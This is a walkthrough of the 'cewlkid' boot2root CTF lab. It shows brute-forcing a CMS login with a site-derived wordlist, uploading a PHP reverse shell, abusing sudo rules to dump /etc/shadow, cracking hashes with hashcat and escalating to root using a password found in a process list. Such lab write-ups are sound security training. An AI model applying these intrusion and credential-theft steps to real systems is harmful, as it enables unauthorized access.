An intermediate boot2root.
The name is a hint.
The start is CTF but the end is real world and worth the effort.
Created in Virtualbox.
Goal: Get the root flag.

Real world eh? Sounds interesting. Let’s see what we’ve got…


We’ve got SSH and two HTTP ports: 80 and 8080. There’s nothing on 80; it’s all on 8080.


The webserver on 8080 is running the Sitemagic CMS, which has default credentials of admin:admin. These don’t work.

After a bunch of enumeration turns up nothing, it’s time to actually pay attention to the hint and run cewl to generate a wordlist from the site contents. Once we’ve done that we run it through Burp Turbo Intruder and learn that the admin password is Letraset.

POST /index.php?SMExt=SMLogin HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: keep-alive
Cookie: SMSESSION6b631023323ea9ab=5pkean88dt4q0kji6fkdhim3qv
Upgrade-Insecure-Requests: 1


Now what?

Well, according to exploit-db we can upload arbitrary files, which includes any old PHP reverse shell. In fact the maker seems to have left one on the box already, but it has a different IP to mine so I had to make my own. Well, pentestmonkey made it for me, but you get the idea. We upload it and execute, we’re in.

Whether or not this is actually an ‘exploit’ or a deliberate design choice by the CMS maker is not clear to me, but I guess it doesn’t really matter.

On the box

Looking at /etc/passwd we have a few different users, and in running sudo -l we find our user (www-data) can run cat as user ipsum. So maybe ipsum has something for us?

Yes actually. Running:

www-data@cewlkid:/$ find . -user ipsum > /tmp/files 2>/dev/null

brings us to an interesting looking file, and when we read it:

www-data@cewlkid:/tmp$ sudo -u ipsum /usr/bin/cat /var/www/


So what’s that about? It’s base64, and decodes to:

ipsum : SpeakPeople22!
lorem : PeopleSpeak44!

Great, so now we’ve got two users with passwords, and we can SSH in and su between them at will.

Now what? Well, one of our users (lorem) has been set up in /etc/sudoers to read /etc/shadow with base64, which we again learn by running sudo -l. So … we can simply decode the base64 and now we have the shadow file. So that’s all well and good, but surely it’s more on the CTF end of the spectrum than the real world end?

Anyway, moving on. We can crack the hash for yet another user (zerocewl) using our wordlist that we gathered earlier using cewl:

.\hashcat64.exe -m 1800 .\hash.txt .\words.txt .\rules\best64.rule

Note: I ran hashcat on my Windows host rather than on Kali. I probably didn’t need to include the rules but I did anyway; it was a short wordlist.

Now we have another set of creds:



When we run linpeas we can see this in the processes:

root 1994 0.0 0.8 27088 8256 ? S 10:26 0:00 /root/pth-toolkit-master/bin/winexe -U cewlbeans%fondateurs //kali whoami **

Is that a another password? Why yes, yes it is.

zerocewl@cewlkid:~$ su cewlbeans
Password: fondateurs
cewlbeans@cewlkid:/home/zerocewl$ sudo -l
[sudo] password for cewlbeans: 
Matching Defaults entries for cewlbeans on cewlkid:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cewlbeans may run the following commands on cewlkid:
    (ALL : ALL) ALL
cewlbeans@cewlkid:/home/zerocewl$ sudo su
root@cewlkid:/home/zerocewl# cd /root
root@cewlkid:~# ls -lash
total 48K
4.0K drwx------  6 root root 4.0K Sep 10 21:41 .
4.0K drwxr-xr-x 21 root root 4.0K Sep  9 12:11 ..
   0 lrwxrwxrwx  1 root root    9 Sep  9 15:59 .bash_history -> /dev/null
4.0K -rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
4.0K -rw-------  1 root root   92 Sep  9 22:53 .lesshst
4.0K drwxr-xr-x  3 root root 4.0K Sep  8 23:09 .local
4.0K -rw-r--r--  1 root root  161 Dec  5  2019 .profile
4.0K drwxr-xr-x  5 root root 4.0K Sep  9 23:44 pth-toolkit-master
4.0K -rw-r--r--  1 root root 2.0K Sep 10 21:41 root.txt
4.0K -rw-r--r--  1 root root   66 Sep  9 17:35 .selected_editor
4.0K drwxr-xr-x  3 root root 4.0K Sep  7 23:42 snap
4.0K drwx------  2 root root 4.0K Sep  7 23:42 .ssh
4.0K -rw-r--r--  1 root root  209 Sep  9 16:12 .wget-hsts
root@cewlkid:~# cat root.txt
**ASCII graphic removed**         
root@cewlkid:~# echo 'RmxhZwo=' | base64 -d

Well, I guess that’s that then.

Final thoughts

When we’re root we can read /etc/sudoers and it looks like this:

www-data ALL=(ipsum:ipsum) NOPASSWD:/usr/bin/cat
lorem ALL=(root:root) NOPASSWD:/usr/bin/base64 /etc/shadow
zerocewl ALL=(root:root) NOPASSWD:/usr/bin/cp /home/zerocewl/hosts /etc/hosts cewlbeans ALL=(ALL:ALL) ALL

Okay, now I’ve never worked as a Linux sysadmin but it’s not entirely clear to me which part of this is supposed to be particularly real world. Anyway it was still fun, so thanks iamv1nc3nt.